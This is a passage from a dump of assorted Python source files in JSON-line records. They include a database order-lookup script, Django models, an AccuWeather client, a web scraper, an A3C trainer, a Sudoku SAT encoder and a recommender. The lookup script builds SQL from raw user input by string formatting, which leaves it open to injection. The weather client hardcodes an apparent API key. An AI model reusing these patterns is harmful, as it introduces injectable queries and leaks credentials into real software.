encoding='utf-8')\nkeyword = str(input(\"多关键字查询(条件空格分割,模糊匹配)\\n例如1:海岸城,8002 通知骑手;例如2:海上世界 估清波波茶:\"))\n\n\ndef get_keywords(keyword):\n input_massage = {'shop_name': None, 'pickup': None, 'operation': None, 'NO': None}\n keywords = keyword.split()\n lens = len(keywords)\n for i in range(lens):\n if i == 0:\n if keywords[i].isdigit() and len(keywords[i]) > 4:\n input_massage['NO'] = keywords[i]\n else:\n input_massage['shop_name'] = keywords[i]\n elif i == 1:\n if keywords[i].isdigit():\n input_massage['pickup'] = keywords[i]\n else:\n input_massage['operation'] = keywords[i]\n elif i == 2:\n input_massage['operation'] = keywords[i]\n return input_massage\n\n\ndef get_sql():\n sql_dict = {\"mysql\": None, \"mongo\": {\"operation\": None}}\n sqls = get_keywords(keyword=keyword)\n if sqls[\"NO\"] is not None :\n sql_NO = \"SELECT * FROM orders WHERE `no` = '%s'\" % sqls[\"NO\"]\n sql_dict[\"mysql\"] = sql_NO\n if sqls[\"operation\"] is not None:\n sql_dict[\"mongo\"][\"operation\"] = sqls[\"operation\"]\n\n elif sqls[\"shop_name\"] is not None and sqls[\"pickup\"] is None:\n sql_shop = \"SELECT id, `no`, code, `name`,city FROM shops where `name` LIKE '%%%s%%'\" % sqls[\"shop_name\"]\n sql_dict[\"mysql\"] = sql_shop\n if sqls[\"operation\"] is not None:\n sql_dict[\"mongo\"][\"operation\"] = sqls[\"operation\"]\n sql_dict[\"mongo\"][\"name\"] = sqls[\"shop_name\"]\n\n elif sqls[\"shop_name\"] is not None and sqls[\"pickup\"] is not None:\n sql_order = \"SELECT shops.`name`,orders.* FROM orders LEFT JOIN shops ON orders.shop_id = shops.id WHERE\" \\\n \" orders.pickup_no = '%s' AND shops.`name` LIKE '%%%s%%' ORDER BY orders.id DESC LIMIT 10\" \\\n % (sqls[\"pickup\"], sqls[\"shop_name\"])\n sql_dict[\"mysql\"] = sql_order\n if sqls[\"shop_name\"] is not None: pass\n\n return sql_dict\n\n\ndef get_sql_sets():\n sqls = get_keywords(keyword=keyword)\n sql_NO = \"SELECT * FROM orders WHERE `no` = '%s'\" % sqls[\"NO\"]\n sql_shop = \"SELECT id, `no`, code, `name`,city FROM shops where `name` LIKE '%%%s%%'\" % sqls[\"shop_name\"]\n sql_order = \"SELECT shops.`name`,orders.* FROM orders LEFT JOIN shops ON orders.shop_id = shops.id WHERE \" \\\n \"orders.pickup_no = '%s' AND shops.`name` LIKE '%%%s%%' ORDER BY orders.id DESC LIMIT 10\" \\\n % (sqls[\"pickup\"], sqls[\"shop_name\"])\n mongo_NO = {'order_no': sqls[\"NO\"]}\n\n\ndef select_db():\n global sql_order\n myconfig = pymysql.connect(host=conf.get(\"MySql\", \"mysql_host\"),\n port=int(conf.get(\"MySql\", \"mysql_port\")),\n user=conf.get(\"MySql\", \"mysql_username\"),\n passwd=conf.get(\"MySql\", \"mysql_password\"),\n db=conf.get(\"MySql\", \"db_name\"),\n charset='utf8',\n cursorclass=pymysql.cursors.DictCursor\n )\n cursor = myconfig.cursor()\n try:\n cursor.execute(sql_order)\n except Exception:\n cursor.execute(sql_shop)\n data = cursor.fetchall()\n if not data:\n return dict(code=99, data=data) # 为空\n else:\n return dict(code=0, data=data)\n\n\n# def select_mongodb():\n# mongo_host = conf.get('mongodb', 'mongo_host')\n# mongo_database = conf.get('mongodb', 'database')\n# mongo_username = conf.get('mongodb', 'username')\n# mongo_password = conf.get('mongodb', 'password')\n# uri = \"mongodb://%s:%s@%s/%s?authMechanism=SCRAM-SHA-1\" % (\n# quote_plus(mongo_username), quote_plus(mongo_password), quote_plus(mongo_host), mongo_database)\n# client = pymongo.MongoClient(uri)\n# # print(client.database_names())\n# set = client[\"heyteago\"][conf.get(\"mongodb\", \"shop\")]\n# # sets = {'shop_id': 97, 'operate_code': 9, 'operate_detail': {'$regex': '冷萃知秋'}}\n# sets = {'shop_id': 109, 'operate_detail': {'$regex': '755030201811301339248227'}}\n# data = set.find(dict(sets)).limit(3).sort('_id', pymongo.DESCENDING)\n# client.close()\n# for i in data:\n# print(i)\n\n\n# select_mongodb()\n# db = select_db()[\"code\"]\n# if db == 0:\n# for data in select_db()[\"data\"]:\n# print(data,)\n# elif db == 99:\n# print(\"查询为空\")\n\n","sub_path":"common/select_db.py","file_name":"select_db.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"145553534","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nimport string\nimport random\n\nclass UserProduct(models.Model):\n user = models.ForeignKey(User)\n product = models.ForeignKey('Product')\n is_visible = models.BooleanField(default=True)\n is_wishlist = models.BooleanField(default=True)\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\nclass Product(models.Model):\n title = models.TextField()\n is_available = models.BooleanField(default=True)\n is_visible = models.BooleanField(default=True)\n # is_wishlist = models.BooleanField(default=True)\n price = models.FloatField(default=0)\n special_price = models.FloatField(default=0)\n # promotion_discount = models.FloatField(default=0)\n # quantity = models.IntegerField(default=0)\n # available_quantity = models.IntegerField(default=0)\n cateory = models.ForeignKey(\"Product__Category\")\n hashtag = models.CharField(max_length=255, null=True, blank=True)\n image = models.ImageField(upload_to='static/media/images/', null=True, blank=True)\n promotion_code = models.CharField(max_length=255, null=True, blank=True)\n scan_code = models.CharField(max_length=255, null=True, blank=True)\n featured = models.BooleanField(default=False)\n\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\nclass Product__Category(models.Model):\n name = models.CharField(max_length=255, null=True, blank=True)\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\n\n# def create__product(sender, instance, created, **kwargs):\n# if created:\n# instance.bar_code = id_generator()\n# instance.save()\n# post_save.connect(create__product, sender=Product)\n#\n# def id_generator(size=20, chars=string.ascii_uppercase + string.digits):\n# return ''.join(random.choice(chars) for _ in range(size))","sub_path":"sr_api__products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"116425000","text":"import requests\nimport ast\n\napi_key = \"kaorsKrOCUHhD7oBiZ4AJvUfoHoVAmcM\"\n\n\nclass Weatherplz():\n def __init__(self, key=api_key, location=None):\n self.key = key\n self.headers = {\n 'x-rapidapi-host': \"dataservice.accuweather.com\",\n 'x-rapidapi-key': \"kaorsKrOCUHhD7oBiZ4AJvUfoHoVAmcM\",\n 'content-type': \"application/x-www-form-urlencoded\"\n }\n self.location = location\n self.url = \"http://dataservice.accuweather.com/locations/v1/search\"\n self.current = self.get_current()\n #def get_key(self):\n # r = requests.get(self.url, params=self.headers,\n # headers=self.headers)\n # print(r)\n #print(r.text)\n #print(r.headers)\n\n\n def get_key(self):\n locstring = self.location.replace(\" \", \"%20\")\n r = requests.post(\"http://dataservice.accuweather.com/locations/v1/sear\"\n \"ch?apikey=kaorsKrOCUHhD7oBiZ4AJvUfoHoVAmcM&q=\"\n \"{}&language=en-uk&details=true&offset=1\"\n .format(locstring))\n loc_key = r.json()[0].get(\"Key\")\n\n print(\"url: \" + str(r.url))\n print(\"headers: \" + str(r.headers))\n print(\"r.text: \" + str(r.text))\n print(type(r.json()))\n print(str(loc_key))\n return loc_key\n\n def get_current(self):\n r = requests.get(\"http://dataservice.accuweather.com\"\n \"/currentconditions/v1/{}?\"\n \"apikey=kaorsKrOCUHhD7oBiZ4AJvUfoHoVAmcM\"\n \"&language=en-us&details=true\"\n .format(self.get_key()))\n print(r.url)\n return r.json()[0]","sub_path":"venv/accuweatherapi.py","file_name":"accuweatherapi.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"373205460","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\nimport datetime\nfrom multiprocessing import Pool\n\n# План:\n# 1) Мы создадим однопоточный парсер\n# 2) Замерим время\n# 3) После мы создадим многопоточный парсер в котором\n# будем использовать библиотеку multiproccesing и будем\n# работать с классом Pool\n# 4) Дальше замерим время\n# 5) И экспортируем полученный данные в формат csv .\n\ndef get_html(url):\n r = requests.get(url)\n return r.text\n\ndef get_all_links(html):\n soup = BeautifulSoup(html, 'html.parser')\n tds = soup.find('table', class_='table').find_all('td')\n links = []\n for td in tds:\n a = td.find('a').get('href')\n link = 'http://www.kenesh.kg' + a\n if link not in links and 'fraction' not in link:\n links.append(link)\n return links\n\ndef get_page_data(html):\n soup = BeautifulSoup(html, 'html.parser')\n try:\n name = soup.find('h3', class_='deputy-name').text.strip()\n except:\n name = \"neto\"\n try:\n number = soup.find(\"p\", class_='mb-10').text.strip()\n except:\n number = \"neto\"\n try:\n bio = soup.find('div', id='biography').text.strip()\n except:\n bio = 'neto'\n data = {\"name\": name, \"number\": number, \"bio\": bio}\n return data\n\ndef write_csv(data):\n with open('deputy.csv','a') as file:\n writer = csv.writer(file)\n writer.writerow((data['name'], data['number'], data['bio'])) # Здесь записывает в файл csv\n print(data['name'], '\\n', data['number'], '\\n', data['bio'],'parsed') # Здесь просто принтит в терминал\n\ndef make_all(url):\n html = get_html(url)\n data = get_page_data(html)\n write_csv(data)\n\ndef main():\n start = datetime.datetime.now()\n url = 'http://kenesh.kg/ky/deputy/list/35'\n all_links = get_all_links(get_html(url))\n with Pool(40)as p:\n p.map(make_all, all_links)\n end = datetime.datetime.now()\n result = end - start\n print(str(result))\n\nif __name__ == \"__main__\": # точка входа\n main()\n","sub_path":"parsing_kenesh_s_multiprocessing.py","file_name":"parsing_kenesh_s_multiprocessing.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"527460630","text":"import configparser\n\nclass Config:\n def read_config(self):\n config = configparser.ConfigParser()\n config.read('config.ini')\n APP_ID = config['config']['APP_ID']\n API_KEY = config['config']['API_KEY']\n SECRET_KEY = config['config']['SECRET_KEY']\n return [APP_ID,API_KEY,SECRET_KEY]","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"147769424","text":"import os\nfrom ActorCriticModel import *\nfrom Agent import Agent\nfrom torch.multiprocessing import Process, Pipe, Lock\nfrom visdom import Visdom\nfrom SharedOptim import SharedRMSprop\nimport numpy as np\n\nif __name__ == '__main__':\n os.environ[\"OMP_NUM_THREADS\"] = \"1\"\n\n vis = Visdom()\n reward_layout = dict(title=\"Episode rewards\", xaxis={'title': 'episode'}, yaxis={'title': 'reward'})\n policy_layout = dict(title=\"Policy loss\", xaxis={'title': 'n-step iter'}, yaxis={'title': 'loss'})\n value_layout = dict(title=\"Value loss\", xaxis={'title': 'n-step iter'}, yaxis={'title': 'loss'})\n entropy_layout = dict(title=\"Entropies\", xaxis={'title': 'n-step iter'}, yaxis={'title': 'entropy'})\n\n MAX_EPISODES = 20000\n MAX_ACTIONS = 50000\n DISCOUNT_FACTOR = 0.99\n STEPS = 20\n\n GlobalModel = ActorCriticModel_Breakout()\n GlobalModel.share_memory()\n\n Optimizer = None\n #Optimizer = SharedRMSprop(GlobalModel.parameters(), lr=0.0007, eps=0.1, alpha=0.99, momentum=0.0)\n CriticOptimizer = SharedRMSprop(GlobalModel.getCriticParameters(), lr=0.00035, alpha=0.99, eps=0.1, momentum=0.0)\n ActorOptimizer = SharedRMSprop(GlobalModel.getActorParameters(), lr=0.0007, alpha=0.99, eps=0.1, momentum=0.0)\n #Optimizer.share_memory()\n CriticOptimizer.share_memory()\n ActorOptimizer.share_memory()\n\n lock = Lock()\n\n num_cpu = 4\n agents = []\n for cpu in range(num_cpu):\n agents.append(Agent(cpu))\n\n receiver, sender = Pipe()\n\n agent_threads = []\n for agent in agents:\n thread = Process(target=agent.letsgo, args=(GlobalModel, CriticOptimizer, ActorOptimizer, lock, sender,\n MAX_EPISODES, MAX_ACTIONS, DISCOUNT_FACTOR, STEPS, Optimizer,))\n thread.start()\n agent_threads.append(thread)\n\n dones = [False for _ in range(num_cpu)]\n\n NSTEPITER = []\n VALUELOSS = []\n VALUELOSS_MEAN = []\n valueloss_sample = []\n POLICYLOSS = []\n POLICYLOSS_MEAN = []\n policyloss_sample = []\n ENTROPY = []\n ENTROPY_MEAN = []\n entropy_sample = []\n\n EPISODES = []\n REWARDS = []\n REWARDS_MEAN = []\n reward_sample = []\n\n while True:\n (cpu, is_nstep, value_loss, policy_loss, entropy, reward, complete) = receiver.recv()\n\n dones[cpu] = complete\n\n exit = True\n for d in dones:\n if d == False:\n exit = False\n break\n if exit:\n break\n\n if complete:\n continue\n\n if is_nstep:\n\n valueloss_sample.append(value_loss)\n policyloss_sample.append(policy_loss)\n entropy_sample.append(float(entropy))\n\n if len(valueloss_sample) == 100:\n NSTEPITER.append(len(NSTEPITER) + 1)\n VALUELOSS.append(np.mean(valueloss_sample))\n POLICYLOSS.append(np.mean(policyloss_sample))\n ENTROPY.append(np.mean(entropy_sample))\n valueloss_sample = []\n policyloss_sample = []\n entropy_sample = []\n\n if len(NSTEPITER) % 10 == 0:\n VALUELOSS_MEAN.append(np.mean(VALUELOSS[len(VALUELOSS) - 10:]))\n POLICYLOSS_MEAN.append(np.mean(POLICYLOSS[len(POLICYLOSS) - 10:]))\n ENTROPY_MEAN.append(np.mean(ENTROPY[len(ENTROPY) - 10:]))\n\n trace_value = dict(x=NSTEPITER, y=VALUELOSS, type='custom', mode=\"lines\", name='loss')\n trace_policy = dict(x=NSTEPITER, y=POLICYLOSS, type='custom', mode=\"lines\", name='loss')\n trace_entropy = dict(x=NSTEPITER, y=ENTROPY, type='custom', mode=\"lines\", name='entropy')\n\n trace_value_mean = dict(x=NSTEPITER[::10], y=VALUELOSS_MEAN,\n line={'color': 'red', 'width': 3}, type='custom', mode=\"lines\", name='mean loss')\n trace_policy_mean = dict(x=NSTEPITER[::10], y=POLICYLOSS_MEAN,\n line={'color': 'red', 'width': 3}, type='custom', mode=\"lines\", name='mean loss')\n trace_entropy_mean = dict(x=NSTEPITER[::10], y=ENTROPY_MEAN,\n line={'color': 'red', 'width': 3}, type='custom', mode=\"lines\", name='mean entropy')\n\n vis._send({'data': [trace_value, trace_value_mean], 'layout': value_layout, 'win': 'valuewin'})\n vis._send({'data': [trace_policy, trace_policy_mean], 'layout': policy_layout, 'win': 'policywin'})\n vis._send({'data': [trace_entropy, trace_entropy_mean], 'layout': entropy_layout, 'win': 'entropywin'})\n\n else:\n\n reward_sample.append(reward)\n if(len(reward_sample) == 10):\n EPISODES.append(len(EPISODES) + 1)\n REWARDS.append(np.mean(reward_sample))\n reward_sample = []\n\n if len(EPISODES) % 10 == 0:\n REWARDS_MEAN.append(np.mean(REWARDS[len(REWARDS) - 10:]))\n\n trace_reward = dict(x=EPISODES, y=REWARDS, type='custom', mode=\"lines\", name='reward')\n trace_reward_mean = dict(x=EPISODES[::10], y=REWARDS_MEAN,\n line={'color': 'red', 'width': 4}, type='custom', mode=\"lines\", name='mean reward')\n\n vis._send({'data': [trace_reward, trace_reward_mean], 'layout': reward_layout, 'win': 'rewardwin'})\n\n if len(EPISODES) % 50 == 0:\n print(\"Saved\")\n torch.save(GlobalModel.state_dict(), 'trainModels_Breakout/episodes_' + str(len(EPISODES)) + '.pt')\n\n for thread in agent_threads:\n thread.join()\n\n","sub_path":"nstepTD_A3C_SpaceInvaders/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"30237402","text":"#insert a node at the head of linked list\n\n#hackerrank : https://www.hackerrank.com/challenges/insert-a-node-at-the-head-of-a-linked-list/problem\n\n#python code :\n\ndef insertNodeAtHead(llist, data):\n # Write your code here\n node=SinglyLinkedListNode(data)\n node.next=llist\n llist=node\n return llist\n","sub_path":"Insert at head.py","file_name":"Insert at head.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"296523066","text":"from unittest import TestCase, mock\n\nfrom invoke.runner import Result\n\nfrom semantic_release.git_helpers import commit_new_version, get_commit_log\n\n\nclass GetCommitLogTest(TestCase):\n def test_first_commit_is_not_initial_commit(self):\n self.assertNotEqual(next(get_commit_log()), 'Initial commit')\n\n\nclass CommitNewVersionTests(TestCase):\n @mock.patch('semantic_release.git_helpers.run',\n return_value=Result(stdout='', stderr='', pty='', exited=0))\n def test_add_and_commit(self, mock_run):\n commit_new_version('1.0.0')\n self.assertEqual(\n mock_run.call_args_list,\n [mock.call('git add semantic_release/__init__.py', hide=True),\n mock.call('git commit -m \"1.0.0\"', hide=True)]\n )\n","sub_path":"tests/test_git_helpers.py","file_name":"test_git_helpers.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"439291497","text":"import random\n\nif __name__ == '__main__':\n\ttrain = []\n\tlabel = []\n\twith open('hw2.1_corpus.txt', 'r', encoding='utf-8') as f:\n\t\tlines = f.read().split('\\n')\n\t\tlines.remove('')\n\t\tfor l in range(len(lines[:-1])):\n\t\t\tif len(lines[l]) > 26 or len(lines[l+1]) > 26:\n\t\t\t\tcontinue\n\t\t\ttmpT = ''\n\t\t\tfor w in lines[l]:\n\t\t\t\ttmpT += ' ' + w\n\t\t\ttmpT += ' '\n\t\t\tidx = random.randint(1, len(lines[l+1]))\n\n\t\t\tif random.random()>0.2 and len(lines[l]) <= 24:\n\t\t\t\tidx2 = random.randint(1, len(lines[l+1]))\n\t\t\t\tif idx2\t!=\tidx:\n\t\t\t\t\tif idx2 > idx:\n\t\t\t\t\t\ttmpT += ' ' + str(idx)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx-1]\n\t\t\t\t\t\ttmpT += ' ' + str(idx2)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx2-1]\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmpT += ' ' + str(idx2)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx2-1]\n\t\t\t\t\t\ttmpT += ' ' + str(idx)\n\t\t\t\t\t\ttmpT += ' ' + lines[l+1][idx-1]\n\t\t\t\telse:\n\t\t\t\t\ttmpT += ' ' + str(idx)\n\t\t\t\t\ttmpT += ' ' + lines[l+1][idx-1]\n\t\t\telse:\n\t\t\t\ttmpT += ' ' + str(idx)\n\t\t\t\ttmpT += ' ' + lines[l+1][idx-1]\n\n\t\t\ttmpL = ''\n\t\t\tfor w in lines[l+1]:\n\t\t\t\ttmpL += ' ' + w\n\t\t\ttmpL += ' '\n\t\t\ttrain.append(tmpT)\n\t\t\tlabel.append(tmpL)\n\n\twith open('train4.txt', 'w', encoding='utf-8') as f:\n\t\tfor l in train:\n\t\t\tf.write(l + '\\n')\n\n\twith open('label4.txt', 'w', encoding='utf-8') as f:\n\t\tfor l in label:\n\t\t\tf.write(l + '\\n')","sub_path":"task2/bo/generate_train.py","file_name":"generate_train.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"365626172","text":"from unittest.mock import patch\nfrom flask import url_for\nfrom flask_testing import TestCase\n\nfrom app import app\n\nclass TestBase(TestCase):\n def create_app(self):\n return app\n\nclass TestResponse(TestBase):\n def test_animal_on_page(self):\n with patch(\"requests.get\") as g:\n with patch(\"requests.post\") as p:\n g.return_value.text = \"Lion\"\n p.return_value.text = \"Roar\"\n\n response = self.client.get(url_for(\"index\"))\n self.assertIn(b\"Lion makes the noise Roar\", response.data)\n","sub_path":"service1/testing/test_mock.py","file_name":"test_mock.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"389916758","text":"import time\nfrom typing import List\n\nfrom my_solver.oliver.PuzzleInfo import PuzzleInfoInput, PuzzleInfoEncode\nfrom my_solver.oliver.encoder.EncoderList import EncoderList\nfrom my_solver.oliver.encoder.WriteCNFFile import write_cnf_file, one_template_function_delete, \\\n binary_template_function_delete, unit_template_function_delete\n\n\nclass Encoder(EncoderList):\n\n def calc_block_clauses(self) -> None:\n start = time.perf_counter()\n self.calc_block_clauses_list()\n self.clauses[\"block\"] = binary_template_function_delete(self.clauses[\"block\"])\n self.clauses[\"block_one\"] = one_template_function_delete(self.clauses[\"block_one\"])\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Finish block! Time: \" + str(time_to_encode))\n\n def calc_column_clauses(self) -> None:\n start = time.perf_counter()\n self.calc_column_clauses_list()\n self.clauses[\"column\"] = binary_template_function_delete(self.clauses[\"column\"])\n self.clauses[\"column_one\"] = one_template_function_delete(self.clauses[\"column_one\"])\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Finish column! Time: \" + str(time_to_encode))\n\n def calc_row_clauses(self) -> None:\n start = time.perf_counter()\n self.calc_row_clauses_list()\n self.clauses[\"row\"] = binary_template_function_delete(self.clauses[\"row\"])\n self.clauses[\"row_one\"] = one_template_function_delete(self.clauses[\"row_one\"])\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Finish row! Time: \" + str(time_to_encode))\n\n def calc_cell_clauses(self, field) -> None:\n start = time.perf_counter()\n self.calc_cell_clauses_list(field)\n self.clauses[\"unit\"] = unit_template_function_delete(self.clauses[\"unit\"])\n self.clauses[\"one\"] = one_template_function_delete(self.clauses[\"one\"])\n self.clauses[\"dist\"] = binary_template_function_delete(self.clauses[\"dist\"])\n\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Finish cell! Time: \" + str(time_to_encode))\n\n def encode(self, field: List[List[int]], info_input: PuzzleInfoInput) -> PuzzleInfoEncode:\n self.info = PuzzleInfoEncode(info_input.input_file_complete_absolute(), info_input.length, info_input.text)\n\n # add clauses for at least one possible value in each cell\n self.calc_cell_clauses(field)\n # add clauses for row distinction\n self.calc_row_clauses()\n # add clauses for column distinction\n self.calc_column_clauses()\n # add clauses for block distinction\n self.calc_block_clauses()\n\n num_clause = sum([len(sub_clause_list) for sub_clause_list in self.clauses.values()])\n num_var = self.info.length * self.info.square_of_length\n start_line = f\"p cnf {num_var} {num_clause}\\n\"\n output_file = self.info.output_file_name\n\n start = time.perf_counter()\n write_cnf_file(self.clauses, output_file, start_line)\n end = time.perf_counter()\n time_to_encode = end - start\n print(\"Time to write CNF-File: {time}s\".format(time=time_to_encode))\n return self.info\n","sub_path":"my_solver/oliver/encoder/Encoder.py","file_name":"Encoder.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"76023625","text":"'''\n AMR output functions\n'''\n\nimport os\n\n'''\n HTML\n'''\ndef get_ne(ne):\n name = '%s ---> %s
' % (ne.entity_name_,\n ne.wiki_)\n coreference = ' Coref. name: ' \\\n '%s
' % ne.coreference_\n neighbors = ' Neighbors:    '\n for i in ne.neighbors_:\n neighbors += '%s ' % str(i)\n neighbors += '
'\n coherence = ' Coheret set:  '\n for i in ne.coherence_:\n coherence += '(%s, %s, %s) ' % (i[0], i[1], i[2].entity_name_)\n coherence += '
'\n return '%s\\n%s\\n%s\\n%s\\n
' % (name, coreference, neighbors, coherence)\n\ndef get_sentence(sen, out):\n graph = '' % sen.senid_\n senid = '

%s

' % sen.senid_\n sentence = '

%s

' % sen.sen_\n amr = '

%s

' % sen.amr_. \\\n replace('\\n', '
'). \\\n replace(' ', ' ')\n nes = '
\\n' % (sen.senid_, sen.senid_)\n for n in sen.named_entities_:\n nes += get_ne(sen.named_entities_[n])\n nes += '
'\n out.write('\\n%s\\n%s\\n%s\\n%s\\n%s\\n\\n' % (senid, sentence,\n amr, nes, graph))\n\ndef html(amres, filename, outdir, curt=False):\n out = open('%s/%s.html' % (outdir, filename), 'w')\n import visualizer\n\n graphdir = '%s/%s' % (outdir, 'graphs')\n try:\n os.mkdir(graphdir)\n except OSError:\n pass\n\n # head = '\\n'\n head = os.path.dirname(os.path.abspath(__file__)) + '/../docs/html_head'\n out.write(open(head, 'r').read())\n\n for snt in amres:\n if curt:\n visualizer.visualizer_curt(snt, graphdir)\n else:\n visualizer.visualizer(snt, graphdir)\n get_sentence(snt, out)\n\n'''\n Visualized AMR graphs\n Input: 'Sentence' object\n'''\ndef graph(amres, outdir, curt=False):\n import visualizer\n\n graphdir = '%s/%s' % (outdir, 'graphs')\n try:\n os.mkdir(graphdir)\n except OSError:\n pass\n\n for snt in amres:\n if curt:\n visualizer.visualizer_curt(snt, graphdir)\n else:\n visualizer.visualizer(snt, graphdir)\n\n'''\n AMR nodes\n if you would like to modify the output format of AMR node, modify\n node.py: def __str__(self):\n'''\ndef node(amres, outdir):\n out = open('%s/amr_nodes' % outdir, 'w')\n for snt in amres:\n for acr in snt.amr_nodes_:\n node = snt.amr_nodes_[acr]\n if node.ful_name_ == 'name': # Ingore 'n / name' node\n pass\n else:\n out.write('%s\\n%s\\n' % (snt.senid_, node))\n\n'''\n Named entities\n'''\ndef namedentity(amres, outdir):\n out = open('%s/amr_nes' % outdir, 'w')\n for snt in amres:\n for acr in snt.amr_nodes_:\n node = snt.amr_nodes_[acr]\n if node.is_entity_:\n out.write('%s\\t%s / %s\\t%s\\t%s\\n' % (snt.senid_, node.name_,\n node.ful_name_,\n node.entity_name_,\n node.wiki_))\n\n'''\n AMR paths\n'''\ndef path(amres, outdir):\n out = open('%s/amr_paths' % outdir, 'w')\n for snt in amres:\n for path_type in snt.amr_paths_:\n paths = snt.amr_paths_[path_type]\n for p in paths:\n path = ''\n for i in p:\n path += '(\\'%s\\', \\'%s\\'), ' % (i[0], i[1])\n out.write('%s\\t%s\\t[%s]\\n' % (snt.senid_,\n path_type,\n path.strip(', ')))\n\n'''\n AMR named entity queries\n'''\ndef query(amres, outdir):\n out = open('%s/amr_queries' % outdir, 'w')\n for snt in amres:\n for i in snt.named_entities_:\n ne = snt.named_entities_[i]\n query = '%s(%s|%s)' % (ne.name(), ne.subtype_, ne.maintype_)\n for i in ne.neighbors_:\n query += '%s;' % i[1]\n query += '|'\n for i in ne.coherence_:\n query += '%s;' % i[2].name()\n\n out.write('%s\\t%s\\t%s\\n' % (snt.senid_,\n ne.entity_name_,\n query.strip(';')))\n\n'''\n Named entity wiki titile\n'''\ndef newiki(amr_table, outdir):\n wiki = set()\n output = open(outdir + 'amr_nes_wiki', 'w')\n for docid in sorted(amr_table):\n for senid in sorted(amr_table[docid]):\n sen = amr_table[docid][senid]\n assert sen.senid_ == senid\n amr_nodes = sen.amr_nodes_\n for n in amr_nodes:\n node = amr_nodes[n]\n if node.is_entity_:\n wiki.add(node.wiki_)\n for i in sorted(wiki):\n output.write('%s\\n' % i)\n","sub_path":"amr-reader/src/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"621334925","text":"from collections import OrderedDict\n\nfrom mapping import Mapping\nfrom recommenders.generic_recommender import GenericRecommender, Stats\n\n\nclass CooccurRank(GenericRecommender):\n def __init__(self, BASEDIR, session_only = False, cycle_time=1):\n super().__init__(BASEDIR, session_only, cycle_time)\n self.name = 'coocrank'\n\n mapper = Mapping()\n self.rec_mapping = mapper.get_header_rec()\n self.event_mapping = mapper.get_header_event()\n self.item_id_idx = self.rec_mapping.index('ITEM_SOURCE')\n self.publisher_id_idx = self.rec_mapping.index('PUBLISHER')\n self.recs_idx = self.event_mapping.index('recs')\n self.user_id_idx = self.event_mapping.index('USER_COOKIE')\n\n self.user_item_dict = {}\n self.cooccur_dict = {}\n\n self.correct = 0\n self.total_events = 0\n self.nrrows =0\n self.i = 0\n\n def init_new_day(self):\n self.evaluation = Stats()\n self.user_item_dict = {}\n self.cooccur_dict = {}\n self.session_length = {}\n\n def store(self, item_id, user_id ):\n if not user_id in self.user_item_dict.keys():\n self.user_item_dict[user_id] = []\n if item_id == 0 or item_id =='0' or user_id == '0' or user_id == 0:\n return\n if item_id in self.user_item_dict[user_id]:\n self.i += 1\n return\n\n if item_id not in self.cooccur_dict.keys():\n self.cooccur_dict[item_id] = {}\n for coitem in self.user_item_dict[user_id]:\n if coitem not in self.cooccur_dict.keys():\n self.cooccur_dict[coitem] = {}\n if coitem in self.cooccur_dict[item_id].keys():\n self.cooccur_dict[item_id][coitem] += 1\n else:\n self.cooccur_dict[item_id][coitem] = 1\n if item_id in self.cooccur_dict[coitem].keys():\n self.cooccur_dict[coitem][item_id] += 1\n else:\n self.cooccur_dict[coitem][item_id] = 1\n if not item_id in self.user_item_dict[user_id]:\n self.user_item_dict[user_id].append(item_id)\n\n def store_view(self, nextrec):\n try:\n item_id = nextrec[self.item_id_idx]\n user_id = nextrec[self.user_id_idx]\n\n self.store(item_id, user_id)\n except:\n print(\"exception\")\n print(nextrec)\n print(self.nrrows)\n\n\n def store_event(self, nextevent):\n user_id = nextevent[self.user_id_idx]\n rec_clicked = self.true_rec(nextevent)\n # self.store_view(nextevent)\n\n if user_id != '0':\n self.store(item_id=rec_clicked, user_id=user_id)\n else:\n item_id = nextevent[self.item_id_idx]\n if item_id not in self.cooccur_dict.keys():\n self.cooccur_dict[item_id] = {}\n if rec_clicked not in self.cooccur_dict.keys():\n self.cooccur_dict[rec_clicked] = {}\n if rec_clicked in self.cooccur_dict[item_id].keys():\n 